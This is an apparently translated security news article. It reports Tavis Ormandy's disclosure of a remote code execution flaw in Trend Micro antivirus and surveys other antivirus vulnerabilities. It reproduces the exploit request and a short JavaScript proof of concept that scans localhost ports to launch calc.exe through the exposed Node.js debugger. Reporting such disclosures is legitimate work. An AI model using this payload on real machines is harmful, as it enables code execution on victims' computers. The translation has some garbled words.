Critical vulnerability in TrendMicro antivirus allows remote code execution

A researcher from the Google Project Zero team, Tavis Omandy, has published information about critical vulnerabilities in TrendMicro antivirus. As the expert found out, an error in the code of the software product led to the launch of the Node.js debugging console - with its help, attackers could send commands for remote execution to computers with antivirus installed. Ormandy himself in his message called the error "absurd."

To exploit a vulnerability, an attacker needs to send a request of the form:
')
http://localhost:50820/json/new/?javascript:require('child_process').spawnSync('calc.exe')

Ormandy also wrote a simple exloit code:

 <script> var port = 49152; var maxport = 60000; var concurrent = 128; function nextPort() { var img = document.createElement('IMG'); img.alt = "Testing " + port + "..."; img.src = "http://127.0.0.1: + port++ + "/json/new/?" + "javascript:require('child_process')" + ".spawnSync('calc.exe')"; img.onload = img.onerror = function(e) { document.body.removeChild(e.target); nextPort(); } if (port < maxport) { document.body.appendChild(img); } } for (i = 0; i < concurrent; i++) nextPort(); </script> 

The researcher's message appeared on March 22, and a little more than a week later, on March 30, the company released a patch that partially closes the error - it could not be completely eliminated, but "the most critical problems" were solved.

In addition, the company issued a statement in which it said that only “consumer” products are subject to error, and not technology for corporate customers. The text of the statement leads the British edition of The Register.

Over the past year, this is not the first case of detecting serious vulnerabilities in security software and attacks against antivirus companies. In early February 2016, the same researcher Tavis Ormandi discovered serious vulnerabilities in the antivirus product Malwarebytes. Malwarebytes Antivirus updates were not signed with the company's digital signature and downloaded via an unprotected HTTP connection - this made users susceptible to MiTM attacks.

In addition, earlier in June 2015, the media got information that British and American intelligence agencies were looking for vulnerabilities in Kaspersky Lab products. At about the same time, researchers at Google Project Zero talked about a serious vulnerability in ESET NOD32 Antivirus, which allowed an attacker to read, modify, and delete any files on computers that have antivirus installed.

In the summer of the same year, it became known that Symantec Endpoint Protection detected a number of serious vulnerabilities that allowed attackers to bypass authentication, privilege escalation, read and write files, as well as SQL injection. In addition, at almost the same time, it was announced that BitDefender, an antivirus company, was the victim of a hacker attack, which resulted in the stealing of user passwords that were stored in clear text.

Later in the fall of 2015, serious security bugs were discovered in the TrueCrypt cryptosofert, and several months later, in December of the same year, critical vulnerabilities were also found in Avast antivirus.

In addition, last fall, security researcher Mazin Ahmed published a study in which he was able to detect XSS vulnerabilities in several popular firewalls at once. We checked the PT Application Firewall 's self-learning firewall for exposure to the protection rounds described in the work — all of the presented rounds were blocked by the screen.

To prevent possible problems related to the security of protection tools, you can also use tools that allow you to isolate such solutions from other systems while maintaining their functionality. For example, this system can detect malicious files and links PT MultiScanner .